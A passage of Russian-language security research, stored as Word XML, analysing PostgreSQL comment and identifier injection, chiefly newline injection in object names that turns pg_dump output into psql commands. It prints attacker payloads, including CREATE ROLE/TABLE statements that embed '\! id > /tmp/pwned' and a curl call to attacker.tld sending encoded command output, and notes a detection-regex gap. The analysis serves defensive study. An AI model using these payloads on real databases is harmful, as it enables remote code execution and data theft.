        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> byte не проходит через encoding-pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB3BF07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> регекса для одиночного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--[^\r\n]*\r[^\n]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. сводный regex категории 3.12 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.12.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B449E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F84255F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — Comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — спецификация.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9A6A0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL source: src/backend/parser/scan.l (xqs state)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — реализация.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE36BEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL:2008 standard §5.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0894A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection — line-terminator bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий класс.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FB114" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — comment tricks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8913E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RFC 5424 §6 — Syslog line endings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандарт line endings (для контекста log-handling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD2AE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.12.3 Newline в идентификаторах (R25, CVE-2025-8715)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3E3B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — pg_dump + pg_restore pipeline.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> В отличие от 3.12.1/3.12.2, уязвимая поверхность здесь — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не application-эндпоинт</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chain через persistent state в БД</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: атакующий создаёт объект с опасным именем, payload активируется при последующем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_restore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на другом хосте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F73D0CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E22D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL quoted-identifier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> допускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>любые байты внутри</w:t>
      </w:r>
      <w:r>
        <w:t>, включая newline (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>), tab, нулевые байты в некоторых вариантах. Это часть спецификации (Lexical Structure §4.1.1): *"Quoted identifiers can contain any character, except the character with code zero."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B47FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сериализует объекты БД в текстовый script для последующего restore через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_restore</w:t>
      </w:r>
      <w:r>
        <w:t>). В этом script-е имена объектов вставляются:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7532A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как часть SQL-команд</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE "&lt;name&gt;" ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO "&lt;name&gt;" ...</w:t>
      </w:r>
      <w:r>
        <w:t>. Quoted-identifier-форма; PG-парсер при restore обрабатывает корректно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A256C5D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как часть SQL-комментариев</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Name: &lt;name&gt;; Type: TABLE; Schema: public; Owner: &lt;owner&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пишет такие comment-блоки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>перед</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> каждым CREATE/COPY, для удобочитаемости. Здесь имя — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>внутри `--`-комментария</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB0612" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если имя содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, оно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>разрывает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-комментарий внутри dump-script. Текст после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> попадает в SQL как активная команда. Если атакующий контролирует имя — он контролирует injected SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4DC05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Исторический контекст:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Эту уязвимость нашли в 2012 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), исправили. В 2025 обнаружили </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>регрессию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CVE-2025-8715, R25) — fix покрыл не все случаи (специфичные для plpgsql-функций и для interaction с pg_restore meta-commands).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD992D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Patch-окно (R25):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.6, 16.10, 15.14, 14.19, 13.22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (август 2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E338F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Setup (attacker's prerequisite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0C528A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Атакующий должен иметь право создать объект в БД. Минимальное — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на любой схеме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC73B91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Создание объекта с newline в имени:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294515CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Атакующий с правом CREATE ROLE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A621111" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE "evil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F35B0D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! id &gt; /tmp/pwned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CDDEA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--" LOGIN PASSWORD 'x';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E38F7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04EB62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Или CREATE TABLE на своей schema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C6C5FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE "public"."evil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5C436" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! curl http://attacker.tld/exfil?$(id | base64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676534E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--" (id int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AAF09C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Имя содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, после которого — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> psql meta-command (см. 3.9.7). Внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> это попадёт в комментарий-блок:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD6C16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5188528C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Name: evil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D3946E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! curl http://attacker.tld/exfil?$(id | base64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F23C6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--; Type: TABLE; Schema: public; Owner: evil_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7804A378" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65002130" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — RCE при psql-restore через `\!`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51060C2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: атакующий имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на schema </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
